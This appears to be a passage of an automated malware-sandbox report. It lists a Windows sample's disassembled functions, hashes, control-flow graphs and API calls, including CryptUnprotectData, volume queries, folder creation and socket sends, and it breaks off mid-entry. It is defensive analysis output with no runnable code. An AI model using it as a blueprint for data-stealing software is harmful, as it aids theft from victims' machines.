                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Ml$f3{;
                                                                          • API String ID: 0-3322000646
                                                                          • Opcode ID: 391ab683a56a9910ccf6cff184278876a5ae05fb62e59562a0b3bc28867fc9dc
                                                                          • Instruction ID: 5d2bbe2bb63d383470bb40d559f6f7ef0d241b227deb4a7eb301f13816791cc1
                                                                          • Opcode Fuzzy Hash: 391ab683a56a9910ccf6cff184278876a5ae05fb62e59562a0b3bc28867fc9dc
                                                                          • Instruction Fuzzy Hash: D4C20E74D092A88ADB65CF68C9807DDBBB1BF59300F1482DAD84DA7342DB756E84CF81
                                                                          Function 00BDF480 Relevance: 3.5, APIs: 2, Instructions: 484COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BDF635
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BDF937
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 885266447-0
                                                                          • Opcode ID: 0641082188072c5b6cc25b8187704670c62d77571534befa551f59583375e072
                                                                          • Instruction ID: ab56690d2baf09d98fbf2f7df9b6135c5293ddf9ee0ecdd9e7e41679fd99917d
                                                                          • Opcode Fuzzy Hash: 0641082188072c5b6cc25b8187704670c62d77571534befa551f59583375e072
                                                                          • Instruction Fuzzy Hash: C4024970A08643AFDB14CE28C850B7AF7E5FF88314F1486AAE85AC7750E774E955CB81
                                                                          Function 06B79A10 Relevance: 3.4, APIs: 2, Instructions: 430COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,06BE102C,?,?), ref: 06B79B1E
                                                                            • Part of subcall function 06B797E0: std::exception::exception.LIBCMTD ref: 06B7981C
                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 06B79FE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DirectoryInformationVolumeWindowsstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1347862782-0
                                                                          • Opcode ID: 0c0cfe9a0edcb9e2459260edbbc0dbaa9f355cb2effa041f03e9003446bd38bf
                                                                          • Instruction ID: 31c6c38204f988b537da95973dfa52e45d1d27b9ca062d937ea0cda3d255f751
                                                                          • Opcode Fuzzy Hash: 0c0cfe9a0edcb9e2459260edbbc0dbaa9f355cb2effa041f03e9003446bd38bf
                                                                          • Instruction Fuzzy Hash: FC3202B4D052A88BDB65CF68C881BEDFBB1AF59300F1481DAD988B7345EB305A85CF51
                                                                          Function 00B66A80 Relevance: 1.7, APIs: 1, Instructions: 216encryptionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00B66AD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CryptDataUnprotect
                                                                          • String ID:
                                                                          • API String ID: 834300711-0
                                                                          • Opcode ID: dcddaf102aec610ed7e95c2bec9315d1e946bd80df37bfcb931f43f26ac1fe24
                                                                          • Instruction ID: 0a4072bc3ab69cd00a1afe1b385e7bd2f7be3ae236a3380bbff3a2e4c4f8af15
                                                                          • Opcode Fuzzy Hash: dcddaf102aec610ed7e95c2bec9315d1e946bd80df37bfcb931f43f26ac1fe24
                                                                          • Instruction Fuzzy Hash: D771C271C002489BDF10DFA8C945BEEFBB4EB05310F14826AE851B73D2EB395A44CBA1
                                                                          Function 06B9D540 Relevance: 1.6, Strings: 1, Instructions: 352COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::exception::exception
                                                                          • String ID: 50500
                                                                          • API String ID: 2807920213-2230786414
                                                                          • Opcode ID: 880a0cf0a6dbb1133f1c10864de5cf1cf6c0d9754ad2a4865623d8d3f5f193dd
                                                                          • Instruction ID: 7d2e1e2aa69ed0d05c5876d1a53448d7459dd2a14fac09b66b41a57171a7887e
                                                                          • Opcode Fuzzy Hash: 880a0cf0a6dbb1133f1c10864de5cf1cf6c0d9754ad2a4865623d8d3f5f193dd
                                                                          • Instruction Fuzzy Hash: 701223B4D042A88BDB65CFA8C980BEDFBB1AF59300F1081DAD949B7351EB305A85CF51
                                                                          Function 00B6F200 Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %s|%s
                                                                          • API String ID: 0-3399301454
                                                                          • Opcode ID: b7ea23e8d205bc5776cf6eccce51b6ab343cc822aef2f50be55252757c1c1ee5
                                                                          • Instruction ID: 363a3ff804e45b306eda3087bb5c14c16e864bf3b55378832e724a43c9b6e056
                                                                          • Opcode Fuzzy Hash: b7ea23e8d205bc5776cf6eccce51b6ab343cc822aef2f50be55252757c1c1ee5
                                                                          • Instruction Fuzzy Hash: F79169B1D00208DFDB14CFA4DC55BAEBBB5FF58700F104159E549AB292D770AA44CFA5
                                                                          Function 00AFE0C0 Relevance: 17.4, APIs: 11, Instructions: 889COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 10450 afe0c0-afe1c6 call aab8e0 call ab32d0 call abab20 CreateDirectoryA 10457 afe1cc-afe1d0 10450->10457 10458 afe861-afe868 10450->10458 10459 afe1d2-afe1ed 10457->10459 10460 afe86e-afe90a call ab32d0 call abab20 CreateDirectoryA 10458->10460 10461 aff0ed-aff3d2 call aa2df0 10458->10461 10462 afe825-afe850 call ab63b0 call b7efb0 10459->10462 10463 afe1f3-afe33d call ab63b0 * 4 call ab32d0 call abab20 call abad80 call aa2df0 call b86c20 10459->10463 10478 aff0de-aff0e8 call aa2df0 10460->10478 10479 afe910-afe914 10460->10479 10462->10458 10481 afe852-afe859 call b866f0 10462->10481 10521 afe33f-afe357 CreateDirectoryA 10463->10521 10522 afe35d-afe430 call ab32d0 call abab20 call abad80 call ab62c0 call aa2df0 * 2 call b86c20 10463->10522 10478->10461 10484 afe916-afe931 10479->10484 10489 afe85e 10481->10489 10487 aff09f-aff0cd call ab63b0 call b77580 10484->10487 10488 afe937-afea87 call ab63b0 * 4 call ab32d0 call abab20 call abad80 call aa2df0 call b86c20 10484->10488 10487->10478 10504 aff0cf-aff0d6 call b866f0 10487->10504 10540 afea89-afeaa1 CreateDirectoryA 10488->10540 10541 afeaa7-afeb7a call ab32d0 call abab20 call abad80 call ab62c0 call aa2df0 * 2 call b86c20 10488->10541 10489->10458 10510 aff0db 10504->10510 10510->10478 10521->10522 10524 afe7d4-afe820 call aa2df0 * 5 10521->10524 10573 afe432-afe44a CreateDirectoryA 10522->10573 10574 afe450-afe457 10522->10574 10524->10459 10540->10541 10546 aff04e-aff09a call aa2df0 * 5 10540->10546 10600 afeb7c-afeb94 CreateDirectoryA 10541->10600 10601 afeb9a-afeba1 10541->10601 10546->10484 10573->10524 10573->10574 10577 afe45d-afe51d call ab32d0 call abab20 call abad80 call aa2df0 call b86c20 10574->10577 10578 afe560-afe564 10574->10578 10635 afe51f-afe540 CreateDirectoryA 10577->10635 10636 afe542-afe54c call ab6290 10577->10636 10583 afe5ce-afe5d2 10578->10583 10584 afe566-afe5c9 call ab32d0 10578->10584 10588 afe639-afe67f call ab32d0 10583->10588 10589 afe5d4-afe637 call ab32d0 10583->10589 10596 afe684-afe772 call aa2cf0 call ab32d0 call abab20 call abae20 call ab62c0 call aa2df0 * 3 call b86c20 10584->10596 10588->10596 10589->10596 10688 afe78e-afe7ce call ab63b0 * 2 call b7fe80 10596->10688 10689 afe774-afe78c CreateDirectoryA 10596->10689 10600->10546 10600->10601 10603 afecaa-afecae 10601->10603 10604 afeba7-afec67 call ab32d0 call abab20 call abad80 call aa2df0 call b86c20 10601->10604 10607 afecb4-afed4e call ab32d0 call abab20 call b86c20 10603->10607 10608 afedc3-afedc7 10603->10608 10668 afec8c-afec96 call ab6290 10604->10668 10669 afec69-afec8a CreateDirectoryA 10604->10669 10650 afed73-afedb1 call ab63b0 * 2 call b7fe80 10607->10650 10651 afed50-afed71 CreateDirectoryA 10607->10651 10613 afedc9-afee2c call ab32d0 10608->10613 10614 afee31-afee35 10608->10614 10633 afeeff-afefce call aa2cf0 call ab32d0 call abab20 call abae20 call aa2df0 * 2 call b86c20 10613->10633 10622 afee9c-afeefa call ab32d0 10614->10622 10623 afee37-afee9a call ab32d0 10614->10623 10622->10633 10623->10633 10694 afeff3-aff039 call ab63b0 * 2 call b7fe80 10633->10694 10695 afefd0-afeff1 CreateDirectoryA 10633->10695 10635->10636 10641 afe551-afe55b call aa2df0 10635->10641 10636->10641 10641->10578 10655 afedb4-afedbe 10650->10655 10651->10650 10651->10655 10662 aff049 call aa2df0 10655->10662 10662->10546 10673 afec9b-afeca5 call aa2df0 10668->10673 10669->10668 10669->10673 10673->10603 10688->10524 10705 afe7d0 10688->10705 10689->10524 10689->10688 10697 aff03f-aff043 10694->10697 10708 aff03b 10694->10708 10695->10694 10695->10697 10697->10662 10705->10524 10708->10697
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFE1C2
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,-0000004C), ref: 00AFE353
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,-0000004C), ref: 00AFE446
                                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFE53C
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 00AFE788
                                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFE906
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,-0000004C), ref: 00AFEA9D
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,-0000004C), ref: 00AFEB90
                                                                            • Part of subcall function 00B86C20: GetLastError.KERNEL32(?,?,?,00B05C0F), ref: 00B86C87
                                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFEC86
                                                                            • Part of subcall function 00B86C20: std::_Throw_Cpp_error.LIBCPMT ref: 00B86CCF
                                                                            • Part of subcall function 00B86C20: std::_Throw_Cpp_error.LIBCPMT ref: 00B86CE0
                                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFED6D
                                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFEFED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateDirectory$Cpp_errorThrow_std::_$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 411135664-0
                                                                          • Opcode ID: 7e5989506ff2b3691bbd70515c789cdd06e333342af36e866d0ac98fa95be168
                                                                          • Instruction ID: 0fb62c64328e8e64e98d7791c1d90a66cb796a7d820535f08f55f2d8c42ac67f
                                                                          • Opcode Fuzzy Hash: 7e5989506ff2b3691bbd70515c789cdd06e333342af36e866d0ac98fa95be168
                                                                          • Instruction Fuzzy Hash: 1AA211B0D042689BDB25EF64CD95BDDBBB8AF15304F0041E9E44AA7292EB305F88CF55
                                                                          Function 06B82280 Relevance: 13.6, APIs: 9, Instructions: 96networkCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 10771 6b82280-6b822b7 WSAStartup 10772 6b822b9-6b822bc 10771->10772 10773 6b822c1-6b8230d getaddrinfo 10771->10773 10774 6b823b9-6b823bc 10772->10774 10775 6b8231d-6b82323 10773->10775 10776 6b8230f-6b82318 WSACleanup 10773->10776 10777 6b8232e-6b82332 10775->10777 10776->10774 10778 6b8239b-6b823a9 freeaddrinfo 10777->10778 10779 6b82334-6b82356 socket 10777->10779 10780 6b823ab-6b823b4 WSACleanup 10778->10780 10781 6b823b6 10778->10781 10782 6b82358-6b82361 WSACleanup 10779->10782 10783 6b82363-6b82382 connect 10779->10783 10780->10774 10781->10774 10782->10774 10784 6b82384-6b82395 closesocket 10783->10784 10785 6b82397 10783->10785 10784->10777 10785->10778
                                                                          APIs
                                                                          • WSAStartup.WS2_32(00000202,?), ref: 06B822AA
                                                                          • getaddrinfo.WS2_32(FFFFFFFF,00000000,?,00000000), ref: 06B82300
                                                                          • WSACleanup.WS2_32 ref: 06B8230F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CleanupStartupgetaddrinfo
                                                                          • String ID:
                                                                          • API String ID: 3142474549-0
                                                                          • Opcode ID: d558220d1a3484c733a6b644d5da302136167b8cee31d9186fa03652cc3fd254
                                                                          • Instruction ID: 7506f9d57b3b1b16a3595fe156e9fb684bf4c3754131d3fb8568fd496a1d905a
                                                                          • Opcode Fuzzy Hash: d558220d1a3484c733a6b644d5da302136167b8cee31d9186fa03652cc3fd254
                                                                          • Instruction Fuzzy Hash: CA41CBB4D04208EFDB24EFA8D558AEDBBB5FB48324F108699E525A73C0D7349A41CF94
                                                                          Function 00B037B0 Relevance: 11.1, APIs: 3, Strings: 2, Instructions: 2365COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B86C20: GetLastError.KERNEL32(?,?,?,00B05C0F), ref: 00B86C87
                                                                            • Part of subcall function 00B86B90: CreateDirectoryA.KERNEL32(?,00000000,00B03997), ref: 00B86BD5
                                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00B05C30
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 00B05F55
                                                                            • Part of subcall function 00B86C20: std::_Throw_Cpp_error.LIBCPMT ref: 00B86CCF
                                                                            • Part of subcall function 00B86C20: std::_Throw_Cpp_error.LIBCPMT ref: 00B86CE0
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 00B05E46
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateDirectory$Cpp_errorThrow_std::_$ErrorLast
                                                                          • String ID: h-o$h-o
                                                                          • API String ID: 411135664-2901039896
                                                                          • Opcode ID: e4eb5ecf88f6856fa902448d33b09e9ff6c0c1f39a40f41fee5bd0762f6163ea
                                                                          • Instruction ID: 1d7fdbf65a1d24df22465f38682c17073d5ba99d4c05b338335817db0a6a2f96
                                                                          • Opcode Fuzzy Hash: e4eb5ecf88f6856fa902448d33b09e9ff6c0c1f39a40f41fee5bd0762f6163ea
                                                                          • Instruction Fuzzy Hash: FC53CCB0D052689FDB69DF24CD94BDDBBB4AB59300F4041EAE40AA7292DB306F84CF51
                                                                          Function 06BB596C Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 11631 6bb596c-6bb597f call 6bb6140 11634 6bb5981-6bb5983 11631->11634 11635 6bb5985-6bb59a7 call 6bb5502 11631->11635 11636 6bb59ee-6bb59fd 11634->11636 11639 6bb59a9-6bb59ec call 6bb55cd call 6bb6229 call 6bb628a call 6bb5a01 call 6bb576e call 6bb5a0e 11635->11639 11640 6bb5a14-6bb5a2d call 6bb6014 call 6bb6140 11635->11640 11639->11636 11652 6bb5a2f-6bb5a35 11640->11652 11653 6bb5a3e-6bb5a45 11640->11653 11652->11653 11655 6bb5a37-6bb5a39 11652->11655 11656 6bb5a51-6bb5a65 dllmain_raw 11653->11656 11657 6bb5a47-6bb5a4a 11653->11657 11661 6bb5b17-6bb5b26 11655->11661 11658 6bb5a6b-6bb5a7c dllmain_crt_dispatch 11656->11658 11659 6bb5b0e-6bb5b15 11656->11659 11657->11656 11662 6bb5a4c-6bb5a4f 11657->11662 11658->11659 11663 6bb5a82-6bb5a87 call 6b9d540 11658->11663 11659->11661 11662->11663 11667 6bb5a8c-6bb5a94 11663->11667 11670 6bb5abd-6bb5abf 11667->11670 11671 6bb5a96-6bb5a98 11667->11671 11673 6bb5ac1-6bb5ac4 11670->11673 11674 6bb5ac6-6bb5ad7 dllmain_crt_dispatch 11670->11674 11671->11670 11672 6bb5a9a-6bb5ab8 call 6b9d540 call 6bb596c dllmain_raw 11671->11672 11672->11670 11673->11659 11673->11674 11674->11659 11676 6bb5ad9-6bb5b0b dllmain_raw 11674->11676 11676->11659
                                                                          APIs
                                                                          • __RTC_Initialize.LIBCMT ref: 06BB59B3
                                                                          • ___scrt_uninitialize_crt.LIBCMT ref: 06BB59CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Initialize___scrt_uninitialize_crt
                                                                          • String ID:
                                                                          • API String ID: 2442719207-0
                                                                          • Opcode ID: 0e7c521b086f9d1edab9f55f02113ec5244f1f8770521c60fab360b996814117
                                                                          • Instruction ID: ead39fba5d1b82f826588992841b71e4d88606aba5670a96be1eca360dc6346a
                                                                          • Opcode Fuzzy Hash: 0e7c521b086f9d1edab9f55f02113ec5244f1f8770521c60fab360b996814117
                                                                          • Instruction Fuzzy Hash: B241B0F3D10618AFEBF1AF65CC80BFE7A65EB44650F046095E9256B150D7F08D018FA2
                                                                          Function 06BB5A1C Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 11843 6bb5a1c-6bb5a2d call 6bb6140 11846 6bb5a2f-6bb5a35 11843->11846 11847 6bb5a3e-6bb5a45 11843->11847 11846->11847 11848 6bb5a37-6bb5a39 11846->11848 11849 6bb5a51-6bb5a65 dllmain_raw 11847->11849 11850 6bb5a47-6bb5a4a 11847->11850 11853 6bb5b17-6bb5b26 11848->11853 11851 6bb5a6b-6bb5a7c dllmain_crt_dispatch 11849->11851 11852 6bb5b0e-6bb5b15 11849->11852 11850->11849 11854 6bb5a4c-6bb5a4f 11850->11854 11851->11852 11855 6bb5a82-6bb5a87 call 6b9d540 11851->11855 11852->11853 11854->11855 11857 6bb5a8c-6bb5a94 11855->11857 11858 6bb5abd-6bb5abf 11857->11858 11859 6bb5a96-6bb5a98 11857->11859 11861 6bb5ac1-6bb5ac4 11858->11861 11862 6bb5ac6-6bb5ad7 dllmain_crt_dispatch 11858->11862 11859->11858 11860 6bb5a9a-6bb5ab8 call 6b9d540 call 6bb596c dllmain_raw 11859->11860 11860->11858 11861->11852 11861->11862 11862->11852 11864 6bb5ad9-6bb5b0b dllmain_raw 11862->11864 11864->11852
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                          • String ID:
                                                                          • API String ID: 3136044242-0
                                                                          • Opcode ID: 39eed23b122465e1a2d0e313ba20584f9805ed1e2b2c26afa372eff1fa02ed84
                                                                          • Instruction ID: 1441a2831d97d9aa7f9192c9eba59e58d67fc3ca338237b28dd3202245dadb4f
                                                                          • Opcode Fuzzy Hash: 39eed23b122465e1a2d0e313ba20584f9805ed1e2b2c26afa372eff1fa02ed84
                                                                          • Instruction Fuzzy Hash: 01214BB3D01619AFDBB19E25CC80EFE3A69EB84A94B056195F8156B210D2B08D01CFE2
                                                                          Function 00AA9280 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 383libraryloadernetworkCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 12927 aa9280-aa92dd call ab63b0 12930 aa9413-aa9521 call aa2df0 call b8a3a0 12927->12930 12931 aa92e3-aa92e9 12927->12931 12947 aa9523-aa9535 12930->12947 12948 aa9537-aa953f call ab8dc0 12930->12948 12933 aa92f0-aa9313 12931->12933 12935 aa9324-aa9331 12933->12935 12936 aa9315-aa931f 12933->12936 12939 aa9342-aa934f 12935->12939 12940 aa9333-aa933d 12935->12940 12938 aa9403-aa9406 12936->12938 12944 aa9409-aa940d 12938->12944 12941 aa9360-aa936d 12939->12941 12942 aa9351-aa935b 12939->12942 12940->12938 12945 aa937e-aa938b 12941->12945 12946 aa936f-aa9379 12941->12946 12942->12938 12944->12930 12944->12933 12949 aa9399-aa93a6 12945->12949 12950 aa938d-aa9397 12945->12950 12946->12938 12951 aa9544-aa9597 call b8a3a0 * 2 12947->12951 12948->12951 12953 aa93a8-aa93b2 12949->12953 12954 aa93b4-aa93c1 12949->12954 12950->12938 12964 aa95cb-aa95e1 call b8a3a0 12951->12964 12965 aa9599-aa95c8 call b8a3a0 call ad5270 12951->12965 12953->12938 12956 aa93cf-aa93dc 12954->12956 12957 aa93c3-aa93cd 12954->12957 12959 aa93ea-aa93f4 12956->12959 12960 aa93de-aa93e8 12956->12960 12957->12938 12959->12944 12963 aa93f6-aa93ff 12959->12963 12960->12938 12963->12938 12971 aa96e2 12964->12971 12972 aa95e7-aa95ed 12964->12972 12965->12964 12975 aa96e6-aa96f0 12971->12975 12974 aa95f0-aa96ce call c7b136 GetProcAddress WSASend 12972->12974 12986 aa975f-aa9763 12974->12986 12987 aa96d4-aa96dc 12974->12987 12977 aa971e-aa973d 12975->12977 12978 aa96f2-aa96fe 12975->12978 12979 aa976f-aa9796 12977->12979 12980 aa973f-aa974b 12977->12980 12982 aa9700-aa970e 12978->12982 12983 aa9714-aa971b call ad38f3 12978->12983 12984 aa974d-aa975b 12980->12984 12985 aa9765-aa976c call ad38f3 12980->12985 12982->12983 12988 aa9797-aa97fe call ad8c70 call aa2df0 * 2 12982->12988 12983->12977 12984->12988 12991 aa975d 12984->12991 12985->12979 12986->12975 12987->12971 12987->12974 12991->12985
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00AA96B4
                                                                          • WSASend.WS2_32(?,?,00000001,?,00000000,00000000,00000000,?,Ws2_32.dll), ref: 00AA96C9
                                                                          Strings
                                                                          Memory Dump Source
